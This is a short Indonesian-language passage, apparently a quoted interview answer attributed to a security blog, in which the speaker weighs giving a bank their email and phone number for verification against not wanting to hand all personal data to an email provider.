AN: Itu adalah sesuatu yang banyak saya pikirkan akhir-akhir ini. Sepertinya semua opsi lain buruk atau sangat kontroversial. Di satu sisi, saya ingin bank saya tahu siapa saya, dan saya ingin mengungkapkan email dan nomor telepon saya kepada mereka sehingga mereka dapat memverifikasi itu saya dan tahu bagaimana menghubungi saya jika diperlukan. Tetapi jika saya menyiapkan akun email, saya tidak ingin harus memberikan semua informasi saya kepada mereka. Saya tidak terikat pada satu ide alternatif, saya hanya tidak menyukai apa yang kita lakukan sekarang.

Sumber : Krebson Security